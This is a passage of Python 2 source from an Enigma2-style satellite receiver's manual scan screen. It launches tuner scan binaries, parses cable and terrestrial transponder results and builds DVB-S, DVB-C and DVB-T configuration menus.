"QAM32" : parm.Modulation_QAM32,
"QAM64" : parm.Modulation_QAM64,
"QAM128" : parm.Modulation_QAM128,
"QAM256" : parm.Modulation_QAM256 }
inv = { "INVERSION_OFF" : parm.Inversion_Off,
"INVERSION_ON" : parm.Inversion_On,
"INVERSION_AUTO" : parm.Inversion_Unknown }
fec = { "FEC_AUTO" : parm.FEC_Auto,
"FEC_1_2" : parm.FEC_1_2,
"FEC_2_3" : parm.FEC_2_3,
"FEC_3_4" : parm.FEC_3_4,
"FEC_5_6" : parm.FEC_5_6,
"FEC_7_8" : parm.FEC_7_8,
"FEC_8_9" : parm.FEC_8_9,
"FEC_3_5" : parm.FEC_3_5,
"FEC_4_5" : parm.FEC_4_5,
"FEC_9_10" : parm.FEC_9_10,
"FEC_NONE" : parm.FEC_None }
parm.frequency = int(data[1])
parm.symbol_rate = int(data[2])
parm.fec_inner = fec[data[3]]
parm.modulation = qam[data[4]]
parm.inversion = inv[data[5]]
self.__tlist.append(parm)
tmpstr = _("Try to find used transponders in cable network.. please wait...")
tmpstr += "\n\n"
tmpstr += data[1].isdigit() and "%s MHz " % (int(data[1]) / 1000.) or data[1]
tmpstr += data[0]
self.cable_search_session["text"].setText(tmpstr)
def startCableTransponderSearch(self, nim_idx):
def GetCommand(nim_idx):
global cable_autoscan_nimtype
try:
nim_name = nimmanager.getNimName(nim_idx)
if nim_name is not None and nim_name != "":
device_id = ""
nim_name = nim_name.split(' ')[-1][4:-1]
if nim_name == 'TT3L10':
try:
device_id = GetDeviceId('TT3L10', nim_idx)
device_id = "--device=%s" % (device_id)
except Exception, err:
print "GetCommand ->", err
device_id = "--device=0"
# print nim_idx, nim_name, cable_autoscan_nimtype[nim_name], device_id
command = "%s %s" % (cable_autoscan_nimtype[nim_name], device_id)
return command
except Exception, err:
print "GetCommand ->", err
return "tda1002x"
if not self.tryGetRawFrontend(nim_idx):
self.session.nav.stopService()
if not self.tryGetRawFrontend(nim_idx):
if self.session.pipshown:
self.session.infobar.showPiP()
if not self.tryGetRawFrontend(nim_idx):
self.cableTransponderSearchFinished()
return
self.__tlist = [ ]
self.remainingdata = ""
self.cable_search_container = eConsoleAppContainer()
self.cable_search_container.appClosed.append(self.cableTransponderSearchClosed)
self.cable_search_container.dataAvail.append(self.getCableTransponderData)
cableConfig = config.Nims[nim_idx].cable
tunername = nimmanager.getNimName(nim_idx)
try:
bus = nimmanager.getI2CDevice(nim_idx)
if bus is None:
print "ERROR: could not get I2C device for nim", nim_idx, "for cable transponder search"
bus = 2
except:
# older API
if nim_idx < 2:
if HardwareInfo().get_device_name() == "dm500hd":
bus = 2
else:
bus = nim_idx
else:
if nim_idx == 2:
bus = 2 # DM8000 first nim is /dev/i2c/2
else:
bus = 4 # DM8000 second num is /dev/i2c/4
bin_name = None
if tunername == "CXD1981":
bin_name = "CXD1981"
cmd = "cxd1978 --init --scan --verbose --wakeup --inv 2 --bus %d" % bus
elif tunername.startswith("Sundtek"):
bin_name = "mediaclient"
cmd = "/opt/bin/mediaclient --blindscan %d" % nim_idx
else:
bin_name = GetCommand(nim_idx)
cmd = "%(BIN_NAME)s --init --scan --verbose --wakeup --inv 2 --bus %(BUS)d" % {'BIN_NAME':bin_name, 'BUS':bus}
if cableConfig.scan_type.value == "bands":
cmd += " --scan-bands "
bands = 0
if cableConfig.scan_band_EU_VHF_I.value:
bands |= cable_bands["DVBC_BAND_EU_VHF_I"]
if cableConfig.scan_band_EU_MID.value:
bands |= cable_bands["DVBC_BAND_EU_MID"]
if cableConfig.scan_band_EU_VHF_III.value:
bands |= cable_bands["DVBC_BAND_EU_VHF_III"]
if cableConfig.scan_band_EU_UHF_IV.value:
bands |= cable_bands["DVBC_BAND_EU_UHF_IV"]
if cableConfig.scan_band_EU_UHF_V.value:
bands |= cable_bands["DVBC_BAND_EU_UHF_V"]
if cableConfig.scan_band_EU_SUPER.value:
bands |= cable_bands["DVBC_BAND_EU_SUPER"]
if cableConfig.scan_band_EU_HYPER.value:
bands |= cable_bands["DVBC_BAND_EU_HYPER"]
if cableConfig.scan_band_US_LOW.value:
bands |= cable_bands["DVBC_BAND_US_LO"]
if cableConfig.scan_band_US_MID.value:
bands |= cable_bands["DVBC_BAND_US_MID"]
if cableConfig.scan_band_US_HIGH.value:
bands |= cable_bands["DVBC_BAND_US_HI"]
if cableConfig.scan_band_US_SUPER.value:
bands |= cable_bands["DVBC_BAND_US_SUPER"]
if cableConfig.scan_band_US_HYPER.value:
bands |= cable_bands["DVBC_BAND_US_HYPER"]
cmd += str(bands)
else:
cmd += " --scan-stepsize "
cmd += str(cableConfig.scan_frequency_steps.value)
if cableConfig.scan_mod_qam16.value:
cmd += " --mod 16"
if cableConfig.scan_mod_qam32.value:
cmd += " --mod 32"
if cableConfig.scan_mod_qam64.value:
cmd += " --mod 64"
if cableConfig.scan_mod_qam128.value:
cmd += " --mod 128"
if cableConfig.scan_mod_qam256.value:
cmd += " --mod 256"
if cableConfig.scan_sr_6900.value:
cmd += " --sr 6900000"
if cableConfig.scan_sr_6875.value:
cmd += " --sr 6875000"
if cableConfig.scan_sr_ext1.value > 450:
cmd += " --sr "
cmd += str(cableConfig.scan_sr_ext1.value)
cmd += "000"
if cableConfig.scan_sr_ext2.value > 450:
cmd += " --sr "
cmd += str(cableConfig.scan_sr_ext2.value)
cmd += "000"
print bin_name, " CMD is", cmd
self.cable_search_container.execute(cmd)
tmpstr = _("Try to find used transponders in cable network.. please wait...")
tmpstr += "\n\n..."
self.cable_search_session = self.session.openWithCallback(self.cableTransponderSearchSessionClosed, MessageBox, tmpstr, MessageBox.TYPE_INFO)
class TerrestrialTransponderSearchSupport:
# def setTerrestrialTransponderSearchResult(self, tlist):
# pass
# def terrestrialTransponderSearchFinished(self):
# pass
def terrestrialTransponderSearchSessionClosed(self, *val):
print "TerrestrialTransponderSearchSessionClosed, val", val
self.terrestrial_search_container.appClosed.remove(self.terrestrialTransponderSearchClosed)
self.terrestrial_search_container.dataAvail.remove(self.getTerrestrialTransponderData)
if val and len(val):
if val[0]:
self.setTerrestrialTransponderSearchResult(self.__tlist)
else:
self.terrestrial_search_container.sendCtrlC()
self.setTerrestrialTransponderSearchResult(None)
self.terrestrial_search_container = None
self.terrestrial_search_session = None
self.__tlist = None
self.terrestrialTransponderSearchFinished()
def terrestrialTransponderSearchClosed(self, retval):
self.setTerrestrialTransponderData()
opt = self.terrestrialTransponderGetOpt()
if opt is None:
print "terrestrialTransponderSearch finished", retval
self.terrestrial_search_session.close(True)
else:
(freq, bandWidth) = opt
self.terrestrialTransponderSearch(freq, bandWidth)
def getTerrestrialTransponderData(self, str):
self.terrestrial_search_data += str
def setTerrestrialTransponderData(self):
print self.terrestrial_search_data
data = self.terrestrial_search_data.split()
if len(data):
# print "[setTerrestrialTransponderData] data : ", data
if data[0] == 'OK':
# DVB-T : OK frequency bandwidth delivery system -1
# DVB-T2 : OK frequency bandwidth delivery system number_of_plp plp_id0:plp_type0
if data[3] == 1: # DVB-T
parm = eDVBFrontendParametersTerrestrial()
parm.frequency = int(data[1])
parm.bandwidth = int(data[2])
parm.inversion = parm.Inversion_Unknown
parm.code_rate_HP = parm.FEC_Auto
parm.code_rate_LP = parm.FEC_Auto
parm.modulation = parm.Modulation_Auto
parm.transmission_mode = parm.TransmissionMode_Auto
parm.guard_interval = parm.GuardInterval_Auto
parm.hierarchy = parm.Hierarchy_Auto
parm.system = parm.System_DVB_T
parm.plpid = 0
self.__tlist.append(parm)
else:
plp_list = data[5:]
plp_num = int(data[4])
if len(plp_list) > plp_num:
plp_list = plp_list[:plp_num]
for plp in plp_list:
(plp_id, plp_type) = plp.split(':')
if plp_type == '0': # common PLP:
continue
parm = eDVBFrontendParametersTerrestrial()
parm.frequency = int(data[1])
parm.bandwidth = self.terrestrialTransponderconvBandwidth_P(int(data[2]))
parm.inversion = parm.Inversion_Unknown
parm.code_rate_HP = parm.FEC_Auto
parm.code_rate_LP = parm.FEC_Auto
parm.modulation = parm.Modulation_Auto
parm.transmission_mode = parm.TransmissionMode_Auto
parm.guard_interval = parm.GuardInterval_Auto
parm.hierarchy = parm.Hierarchy_Auto
parm.system = parm.System_DVB_T2
parm.plpid = int(plp_id)
self.__tlist.append(parm)
tmpstr = _("Try to find used Transponders in terrestrial network.. please wait...")
tmpstr += "\n\n"
tmpstr += data[1][:-3]
tmpstr += " kHz "
tmpstr += data[0]
self.terrestrial_search_session["text"].setText(tmpstr)
def terrestrialTransponderInitSearchList(self, searchList, region):
tpList = nimmanager.getTranspondersTerrestrial(region)
for x in tpList:
if x[0] == 2: #TERRESTRIAL
freq = x[1] # frequency
bandWidth = self.terrestrialTransponderConvBandwidth_I(x[2]) # bandWidth
parm = (freq, bandWidth)
searchList.append(parm)
def terrestrialTransponderConvBandwidth_I(self, _bandWidth):
bandWidth = {
eDVBFrontendParametersTerrestrial.Bandwidth_8MHz : 8000000,
eDVBFrontendParametersTerrestrial.Bandwidth_7MHz : 7000000,
eDVBFrontendParametersTerrestrial.Bandwidth_6MHz : 6000000,
eDVBFrontendParametersTerrestrial.Bandwidth_5MHz : 5000000,
eDVBFrontendParametersTerrestrial.Bandwidth_1_712MHz : 1712000,
eDVBFrontendParametersTerrestrial.Bandwidth_10MHz : 10000000,
}.get(_bandWidth, 8000000)
return bandWidth
def terrestrialTransponderconvBandwidth_P(self, _bandWidth):
bandWidth = {
8000000 : eDVBFrontendParametersTerrestrial.Bandwidth_8MHz,
7000000 : eDVBFrontendParametersTerrestrial.Bandwidth_7MHz,
6000000 : eDVBFrontendParametersTerrestrial.Bandwidth_6MHz,
5000000 : eDVBFrontendParametersTerrestrial.Bandwidth_5MHz,
1712000 : eDVBFrontendParametersTerrestrial.Bandwidth_1_712MHz,
10000000 : eDVBFrontendParametersTerrestrial.Bandwidth_10MHz,
}.get(_bandWidth, eDVBFrontendParametersTerrestrial.Bandwidth_8MHz)
return bandWidth
def terrestrialTransponderGetOpt(self):
if len(self.terrestrial_search_list) > 0:
return self.terrestrial_search_list.pop(0)
else:
return None
def terrestrialTransponderGetCmd(self, nim_idx):
global terrestrial_autoscan_nimtype
try:
nim_name = nimmanager.getNimName(nim_idx)
if nim_name is not None and nim_name != "":
device_id = ""
nim_name = nim_name.split(' ')[-1][4:-1]
if nim_name == 'TT3L10':
try:
device_id = GetDeviceId('TT3L10', nim_idx)
device_id = "--device %s" % (device_id)
except Exception, err:
print "terrestrialTransponderGetCmd ->", err
device_id = "--device 0"
# print nim_idx, nim_name, terrestrial_autoscan_nimtype[nim_name], device_id
command = "%s %s" % (terrestrial_autoscan_nimtype[nim_name], device_id)
return command
except Exception, err:
print "terrestrialTransponderGetCmd ->", err
return ""
def startTerrestrialTransponderSearch(self, nim_idx, region):
if not self.tryGetRawFrontend(nim_idx):
self.session.nav.stopService()
if not self.tryGetRawFrontend(nim_idx):
if self.session.pipshown: # try to disable pip
self.session.pipshown = False
del self.session.pip
if not self.tryGetRawFrontend(nim_idx):
self.terrestrialTransponderSearchFinished()
return
self.__tlist = [ ]
self.terrestrial_search_container = eConsoleAppContainer()
self.terrestrial_search_container.appClosed.append(self.terrestrialTransponderSearchClosed)
self.terrestrial_search_container.dataAvail.append(self.getTerrestrialTransponderData)
self.terrestrial_search_binName = self.terrestrialTransponderGetCmd(nim_idx)
self.terrestrial_search_bus = nimmanager.getI2CDevice(nim_idx)
if self.terrestrial_search_bus is None:
# print "ERROR: could not get I2C device for nim", nim_idx, "for terrestrial transponder search"
self.terrestrial_search_bus = 2
self.terrestrial_search_list = []
self.terrestrialTransponderInitSearchList(self.terrestrial_search_list ,region)
(freq, bandWidth) = self.terrestrialTransponderGetOpt()
self.terrestrialTransponderSearch(freq, bandWidth)
tmpstr = _("Try to find used transponders in terrestrial network.. please wait...")
tmpstr += "\n\n..."
self.terrestrial_search_session = self.session.openWithCallback(self.terrestrialTransponderSearchSessionClosed, MessageBox, tmpstr, MessageBox.TYPE_INFO)
def terrestrialTransponderSearch(self, freq, bandWidth):
self.terrestrial_search_data = ""
cmd = "%s --freq %d --bw %d --bus %d --ds 2" % (self.terrestrial_search_binName, freq, bandWidth, self.terrestrial_search_bus)
print "SCAN CMD : ",cmd
self.terrestrial_search_container.execute(cmd)
class ScanSetup(ConfigListScreen, Screen, CableTransponderSearchSupport, TerrestrialTransponderSearchSupport):
def __init__(self, session):
Screen.__init__(self, session)
Screen.setTitle(self, _("Manual Scan"))
self.finished_cb = None
self.updateSatList()
self.service = session.nav.getCurrentService()
self.feinfo = None
self.networkid = 0
frontendData = None
if self.service is not None:
self.feinfo = self.service.frontendInfo()
frontendData = self.feinfo and self.feinfo.getAll(True)
self.ter_channel_input = False
self.ter_tnumber = None
self.createConfig(frontendData)
del self.feinfo
del self.service
self.session.postScanService = session.nav.getCurrentlyPlayingServiceOrGroup()
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Scan"))
self["actions"] = NumberActionMap(["SetupActions", "MenuActions", "ColorActions"],
{
"ok": self.keyGo,
"save": self.keyGo,
"cancel": self.keyCancel,
"red": self.keyCancel,
"green": self.keyGo,
"menu": self.doCloseRecursive,
}, -2)
self.statusTimer = eTimer()
self.statusTimer.callback.append(self.updateStatus)
#self.statusTimer.start(5000, True)
self.list = []
ConfigListScreen.__init__(self, self.list)
self["header"] = Label(_("Manual Scan"))
if not self.scan_nims.value == "":
self.createSetup()
self["introduction"] = Label(_("Press OK to start the scan"))
else:
self["introduction"] = Label(_("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."))
def runAsync(self, finished_cb):
self.finished_cb = finished_cb
self.keyGo()
def updateSatList(self):
self.satList = []
for slot in nimmanager.nim_slots:
if slot.isCompatible("DVB-S"):
self.satList.append(nimmanager.getSatListForNim(slot.slot))
else:
self.satList.append(None)
def createSetup(self):
self.list = []
self.multiscanlist = []
index_to_scan = int(self.scan_nims.value)
print "ID: ", index_to_scan
self.tunerEntry = getConfigListEntry(_("Tuner"), self.scan_nims)
self.list.append(self.tunerEntry)
if self.scan_nims == [ ]:
return
self.typeOfScanEntry = None
self.typeOfInputEntry = None
self.systemEntry = None
self.modulationEntry = None
self.preDefSatList = None
self.TerrestrialTransponders = None
self.TerrestrialRegionEntry = None
nim = nimmanager.nim_slots[index_to_scan]
if nim.isCompatible("DVB-S"):
self.typeOfScanEntry = getConfigListEntry(_("Type of scan"), self.scan_type)
self.list.append(self.typeOfScanEntry)
elif nim.isCompatible("DVB-C"):
if config.Nims[index_to_scan].cable.scan_type.value != "provider": # only show predefined transponder if in provider mode
if self.scan_typecable.value == "predefined_transponder":
self.scan_typecable.value = self.cable_toggle[self.last_scan_typecable]
self.last_scan_typecable = self.scan_typecable.value
self.typeOfScanEntry = getConfigListEntry(_("Type of scan"), self.scan_typecable)
self.list.append(self.typeOfScanEntry)
elif nim.isCompatible("DVB-T"):
self.typeOfScanEntry = getConfigListEntry(_("Type of scan"), self.scan_typeterrestrial)
self.list.append(self.typeOfScanEntry)
if self.scan_typeterrestrial.value == "single_transponder":
self.typeOfInputEntry = getConfigListEntry(_("Use frequency or channel"), self.scan_input_as)
if self.ter_channel_input:
self.list.append(self.typeOfInputEntry)
else:
self.scan_input_as.value = self.scan_input_as.choices[0]
self.scan_networkScan.value = False
if nim.isCompatible("DVB-S"):
if self.scan_type.value == "single_transponder":
self.updateSatList()
if nim.isCompatible("DVB-S2"):
self.systemEntry = getConfigListEntry(_('System'), self.scan_sat.system)
self.list.append(self.systemEntry)
else:
# downgrade to dvb-s, in case a -s2 config was active
self.scan_sat.system.value = eDVBFrontendParametersSatellite.System_DVB_S
self.list.append(getConfigListEntry(_('Satellite'), self.scan_satselection[index_to_scan]))
self.list.append(getConfigListEntry(_('Frequency'), self.scan_sat.frequency))
self.list.append(getConfigListEntry(_('Inversion'), self.scan_sat.inversion))
self.list.append(getConfigListEntry(_('Symbol rate'), self.scan_sat.symbolrate))
self.list.append(getConfigListEntry(_('Polarization'), self.scan_sat.polarization))
if self.scan_sat.system.value == eDVBFrontendParametersSatellite.System_DVB_S:
self.list.append(getConfigListEntry(_("FEC"), self.scan_sat.fec))
elif self.scan_sat.system.value == eDVBFrontendParametersSatellite.System_DVB_S2:
self.list.append(getConfigListEntry(_("FEC"), self.scan_sat.fec_s2))
self.modulationEntry = getConfigListEntry(_('Modulation'), self.scan_sat.modulation)
self.list.append(self.modulationEntry)
self.list.append(getConfigListEntry(_('Roll-off'), self.scan_sat.rolloff))
self.list.append(getConfigListEntry(_('Pilot'), self.scan_sat.pilot))
elif self.scan_type.value == "predefined_transponder" and self.satList[index_to_scan]:
self.updateSatList()
self.preDefSatList = getConfigListEntry(_('Satellite'), self.scan_satselection[index_to_scan])
self.list.append(self.preDefSatList)
sat = self.satList[index_to_scan][self.scan_satselection[index_to_scan].index]
self.predefinedTranspondersList(sat[0])
self.list.append(getConfigListEntry(_('Transponder'), self.preDefTransponders))
elif self.scan_type.value == "single_satellite":
self.updateSatList()
print self.scan_satselection[index_to_scan]
self.list.append(getConfigListEntry(_("Satellite"), self.scan_satselection[index_to_scan]))
self.scan_networkScan.value = True
elif "multisat" in self.scan_type.value:
tlist = []
SatList = nimmanager.getSatListForNim(index_to_scan)
for x in SatList:
if self.Satexists(tlist, x[0]) == 0:
tlist.append(x[0])
sat = ConfigEnableDisable(default = "_yes" in self.scan_type.value and True or False)
configEntry = getConfigListEntry(nimmanager.getSatDescription(x[0]), sat)
self.list.append(configEntry)
self.multiscanlist.append((x[0], sat))
self.scan_networkScan.value = True
elif nim.isCompatible("DVB-C"):
if self.scan_typecable.value == "single_transponder":
self.list.append(getConfigListEntry(_("Frequency"), self.scan_cab.frequency))
self.list.append(getConfigListEntry(_("Inversion"), self.scan_cab.inversion))
self.list.append(getConfigListEntry(_("Symbol rate"), self.scan_cab.symbolrate))
self.list.append(getConfigListEntry(_("Modulation"), self.scan_cab.modulation))
self.list.append(getConfigListEntry(_("FEC"), self.scan_cab.fec))
elif self.scan_typecable.value == "predefined_transponder":
self.predefinedCabTranspondersList()
self.list.append(getConfigListEntry(_('Transponder'), self.CableTransponders))
if config.Nims[index_to_scan].cable.scan_networkid.value:
self.networkid = config.Nims[index_to_scan].cable.scan_networkid.value
self.scan_networkScan.value = True
elif nim.isCompatible("DVB-T"):
if self.scan_typeterrestrial.value == "single_transponder":
if nim.isCompatible("DVB-T2"):
self.systemEntry = getConfigListEntry(_('System'), self.scan_ter.system)
self.list.append(self.systemEntry)
else:
self.scan_ter.system.value = eDVBFrontendParametersTerrestrial.System_DVB_T
if self.ter_channel_input and self.scan_input_as.value == "channel":
channel = channelnumbers.getChannelNumber(self.scan_ter.frequency.value*1000, self.ter_tnumber)
if channel:
self.scan_ter.channel.value = int(channel.replace("+","").replace("-",""))
self.list.append(getConfigListEntry(_("Channel"), self.scan_ter.channel))
else:
prev_val = self.scan_ter.frequency.value
self.scan_ter.frequency.value = channelnumbers.channel2frequency(self.scan_ter.channel.value, self.ter_tnumber)/1000
if self.scan_ter.frequency.value == 474000:
self.scan_ter.frequency.value = prev_val
self.list.append(getConfigListEntry(_("Frequency"), self.scan_ter.frequency))
self.list.append(getConfigListEntry(_("Inversion"), self.scan_ter.inversion))
self.list.append(getConfigListEntry(_("Bandwidth"), self.scan_ter.bandwidth))
self.list.append(getConfigListEntry(_("Code rate HP"), self.scan_ter.fechigh))
self.list.append(getConfigListEntry(_("Code rate LP"), self.scan_ter.feclow))
self.list.append(getConfigListEntry(_("Modulation"), self.scan_ter.modulation))
self.list.append(getConfigListEntry(_("Transmission mode"), self.scan_ter.transmission))
self.list.append(getConfigListEntry(_("Guard interval"), self.scan_ter.guard))
self.list.append(getConfigListEntry(_("Hierarchy info"), self.scan_ter.hierarchy))
if self.scan_ter.system.value == eDVBFrontendParametersTerrestrial.System_DVB_T2:
self.list.append(getConfigListEntry(_('PLP ID'), self.scan_ter.plp_id))
elif self.scan_typeterrestrial.value == "predefined_transponder":
self.TerrestrialRegion = self.terrestrial_nims_regions[index_to_scan]
self.TerrestrialRegionEntry = getConfigListEntry(_('Region'), self.TerrestrialRegion)
self.list.append(self.TerrestrialRegionEntry)
self.predefinedTerrTranspondersList()
self.list.append(getConfigListEntry(_('Transponder'), self.TerrestrialTransponders))
elif self.scan_typeterrestrial.value == "complete":
self.TerrestrialRegion = self.terrestrial_nims_regions[index_to_scan]
self.TerrestrialRegionEntry = getConfigListEntry(_('Region'), self.TerrestrialRegion)
self.list.append(self.TerrestrialRegionEntry)
self.list.append(getConfigListEntry(_("Network scan"), self.scan_networkScan))
self.list.append(getConfigListEntry(_("Clear before scan"), self.scan_clearallservices))
self.list.append(getConfigListEntry(_("Only free scan"), self.scan_onlyfree))
self["config"].list = self.list
self["config"].l.setList(self.list)
def Satexists(self, tlist, pos):
for x in tlist:
if x == pos:
return 1
return 0
def newConfig(self):
cur = self["config"].getCurrent()
print "cur is", cur
if cur == self.typeOfScanEntry or \
cur == self.typeOfInputEntry or \
cur == self.tunerEntry or \
cur == self.systemEntry or \
cur == self.preDefSatList or \
cur == self.TerrestrialRegionEntry or \
(self.modulationEntry and self.systemEntry[1].value == eDVBFrontendParametersSatellite.System_DVB_S2 and cur == self.modulationEntry):
self.createSetup()
def createConfig(self, frontendData):
defaultSat = {
"orbpos": 192,
"system": eDVBFrontendParametersSatellite.System_DVB_S,
"frequency": 11836,
"inversion": eDVBFrontendParametersSatellite.Inversion_Unknown,
"symbolrate": 27500,
"polarization": eDVBFrontendParametersSatellite.Polarisation_Horizontal,
"fec": eDVBFrontendParametersSatellite.FEC_Auto,
"fec_s2": eDVBFrontendParametersSatellite.FEC_9_10,
"modulation": eDVBFrontendParametersSatellite.Modulation_QPSK }
defaultCab = {
"frequency": 466,
"inversion": eDVBFrontendParametersCable.Inversion_Unknown,
"modulation": eDVBFrontendParametersCable.Modulation_QAM64,
"fec": eDVBFrontendParametersCable.FEC_Auto,
"symbolrate": 6900,
"system": eDVBFrontendParametersCable.System_DVB_C_ANNEX_A }
defaultTer = {
"frequency" : 474000,
"inversion" : eDVBFrontendParametersTerrestrial.Inversion_Unknown,
"bandwidth" : 8000000,
"fechigh" : eDVBFrontendParametersTerrestrial.FEC_Auto,
"feclow" : eDVBFrontendParametersTerrestrial.FEC_Auto,
"modulation" : eDVBFrontendParametersTerrestrial.Modulation_Auto,
"transmission_mode" : eDVBFrontendParametersTerrestrial.TransmissionMode_Auto,
"guard_interval" : eDVBFrontendParametersTerrestrial.GuardInterval_Auto,
"hierarchy": eDVBFrontendParametersTerrestrial.Hierarchy_Auto,
"system": eDVBFrontendParametersTerrestrial.System_DVB_T,
"plp_id": 0 }
if frontendData is not None:
ttype = frontendData.get("tuner_type", "UNKNOWN")
if ttype == "DVB-S":
defaultSat["system"] = frontendData.get("system", eDVBFrontendParametersSatellite.System_DVB_S)
defaultSat["frequency"] = frontendData.get("frequency", 0) / 1000
defaultSat["inversion"] = frontendData.get("inversion", eDVBFrontendParametersSatellite.Inversion_Unknown)
defaultSat["symbolrate"] = frontendData.get("symbol_rate", 0) / 1000
defaultSat["polarization"] = frontendData.get("polarization", eDVBFrontendParametersSatellite.Polarisation_Horizontal)
if defaultSat["system"] == eDVBFrontendParametersSatellite.System_DVB_S2:
defaultSat["fec_s2"] = frontendData.get("fec_inner", eDVBFrontendParametersSatellite.FEC_Auto)
defaultSat["rolloff"] = frontendData.get("rolloff", eDVBFrontendParametersSatellite.RollOff_alpha_0_35)
defaultSat["pilot"] = frontendData.get("pilot", eDVBFrontendParametersSatellite.Pilot_Unknown)
else:
defaultSat["fec"] = frontendData.get("fec_inner", eDVBFrontendParametersSatellite.FEC_Auto)
defaultSat["modulation"] = frontendData.get("modulation", eDVBFrontendParametersSatellite.Modulation_QPSK)
defaultSat["orbpos"] = frontendData.get("orbital_position", 0)
elif ttype == "DVB-C":
defaultCab["frequency"] = frontendData.get("frequency", 0) / 1000
defaultCab["symbolrate"] = frontendData.get("symbol_rate", 0) / 1000
defaultCab["inversion"] = frontendData.get("inversion", eDVBFrontendParametersCable.Inversion_Unknown)
defaultCab["fec"] = frontendData.get("fec_inner", eDVBFrontendParametersCable.FEC_Auto)
defaultCab["modulation"] = frontendData.get("modulation", eDVBFrontendParametersCable.Modulation_QAM16)
defaultCab["system"] = frontendData.get("system", eDVBFrontendParametersCable.System_DVB_C_ANNEX_A)
elif ttype == "DVB-T":
defaultTer["frequency"] = frontendData.get("frequency", 47400000) / 1000
defaultTer["inversion"] = frontendData.get("inversion", eDVBFrontendParametersTerrestrial.Inversion_Unknown)
defaultTer["bandwidth"] = frontendData.get("bandwidth", 8000000)
defaultTer["fechigh"] = frontendData.get("code_rate_hp", eDVBFrontendParametersTerrestrial.FEC_Auto)
defaultTer["feclow"] = frontendData.get("code_rate_lp", eDVBFrontendParametersTerrestrial.FEC_Auto)
defaultTer["modulation"] = frontendData.get("constellation", eDVBFrontendParametersTerrestrial.Modulation_Auto)
defaultTer["transmission_mode"] = frontendData.get("transmission_mode", eDVBFrontendParametersTerrestrial.TransmissionMode_Auto)
defaultTer["guard_interval"] = frontendData.get("guard_interval", eDVBFrontendParametersTerrestrial.GuardInterval_Auto)
defaultTer["hierarchy"] = frontendData.get("hierarchy_information", eDVBFrontendParametersTerrestrial.Hierarchy_Auto)
defaultTer["system"] = frontendData.get("system", eDVBFrontendParametersTerrestrial.System_DVB_T)
defaultTer["plp_id"] = frontendData.get("plp_id", 0)
self.scan_sat = ConfigSubsection()
self.scan_cab = ConfigSubsection()
self.scan_ter = ConfigSubsection()
nim_list = []
# collect all nims which are *not* set to "nothing"
for n in nimmanager.nim_slots:
if n.config_mode == "nothing":
continue
if n.config_mode == "advanced" and len(nimmanager.getSatListForNim(n.slot)) < 1:
continue
if n.config_mode in ("loopthrough", "satposdepends"):
root_id = nimmanager.sec.getRoot(n.slot_id, int(n.config.connectedTo.value))
if n.type == nimmanager.nim_slots[root_id].type: # check if connected from a DVB-S to DVB-S2 Nim or vice versa
continue
nim_list.append((str(n.slot), n.friendly_full_description))
self.scan_nims = ConfigSelection(choices = nim_list)
if frontendData is not None and len(nim_list) > 0:
self.scan_nims.setValue(str(frontendData.get("tuner_number", nim_list[0][0])))
for slot in nimmanager.nim_slots:
if slot.isCompatible("DVB-T"):
self.ter_tnumber = slot.slot
if self.ter_tnumber is not None:
self.ter_channel_input = channelnumbers.supportedChannels(self.ter_tnumber)
# status
self.scan_snr = ConfigSlider()
self.scan_snr.enabled = False
self.scan_agc = ConfigSlider()
self.scan_agc.enabled = False
self.scan_ber = ConfigSlider()
self.scan_ber.enabled = False
# sat
self.scan_sat.system = ConfigSelection(default = defaultSat["system"], choices = [
(eDVBFrontendParametersSatellite.System_DVB_S, _("DVB-S")),
(eDVBFrontendParametersSatellite.System_DVB_S2, _("DVB-S2"))])
self.scan_sat.frequency = ConfigInteger(default = defaultSat["frequency"], limits = (1, 99999))
self.scan_sat.inversion = ConfigSelection(default = defaultSat["inversion"], choices = [
(eDVBFrontendParametersSatellite.Inversion_Off, _("Off")),
(eDVBFrontendParametersSatellite.Inversion_On, _("On")),
(eDVBFrontendParametersSatellite.Inversion_Unknown, _("Auto"))])
self.scan_sat.symbolrate = ConfigInteger(default = defaultSat["symbolrate"], limits = (1, 99999))
self.scan_sat.polarization = ConfigSelection(default = defaultSat["polarization"], choices = [
(eDVBFrontendParametersSatellite.Polarisation_Horizontal, _("horizontal")),
(eDVBFrontendParametersSatellite.Polarisation_Vertical, _("vertical")),
(eDVBFrontendParametersSatellite.Polarisation_CircularLeft, _("circular left")),
(eDVBFrontendParametersSatellite.Polarisation_CircularRight, _("circular right"))])
self.scan_sat.fec = ConfigSelection(default = defaultSat["fec"], choices = [
(eDVBFrontendParametersSatellite.FEC_Auto, _("Auto")),
(eDVBFrontendParametersSatellite.FEC_1_2, "1/2"),
(eDVBFrontendParametersSatellite.FEC_2_3, "2/3"),
(eDVBFrontendParametersSatellite.FEC_3_4, "3/4"),
(eDVBFrontendParametersSatellite.FEC_5_6, "5/6"),
(eDVBFrontendParametersSatellite.FEC_7_8, "7/8"),
(eDVBFrontendParametersSatellite.FEC_None, _("None"))])
self.scan_sat.fec_s2 = ConfigSelection(default = defaultSat["fec_s2"], choices = [
(eDVBFrontendParametersSatellite.FEC_Auto, _("Auto")),
(eDVBFrontendParametersSatellite.FEC_1_2, "1/2"),
(eDVBFrontendParametersSatellite.FEC_2_3, "2/3"),
(eDVBFrontendParametersSatellite.FEC_3_4, "3/4"),
(eDVBFrontendParametersSatellite.FEC_3_5, "3/5"),
(eDVBFrontendParametersSatellite.FEC_4_5, "4/5"),
(eDVBFrontendParametersSatellite.FEC_5_6, "5/6"),
(eDVBFrontendParametersSatellite.FEC_7_8, "7/8"),
(eDVBFrontendParametersSatellite.FEC_8_9, "8/9"),
(eDVBFrontendParametersSatellite.FEC_9_10, "9/10")])
self.scan_sat.modulation = ConfigSelection(default = defaultSat["modulation"], choices = [
(eDVBFrontendParametersSatellite.Modulation_QPSK, "QPSK"),
(eDVBFrontendParametersSatellite.Modulation_8PSK, "8PSK")])
self.scan_sat.rolloff = ConfigSelection(default = defaultSat.get("rolloff", eDVBFrontendParametersSatellite.RollOff_alpha_0_35), choices = [
(eDVBFrontendParametersSatellite.RollOff_alpha_0_35, "0.35"),
(eDVBFrontendParametersSatellite.RollOff_alpha_0_25, "0.25"),
(eDVBFrontendParametersSatellite.RollOff_alpha_0_20, "0.20"),
(eDVBFrontendParametersSatellite.RollOff_auto, _("Auto"))])
self.scan_sat.pilot = ConfigSelection(default = defaultSat.get("pilot", eDVBFrontendParametersSatellite.Pilot_Unknown), choices = [
(eDVBFrontendParametersSatellite.Pilot_Off, _("Off")),
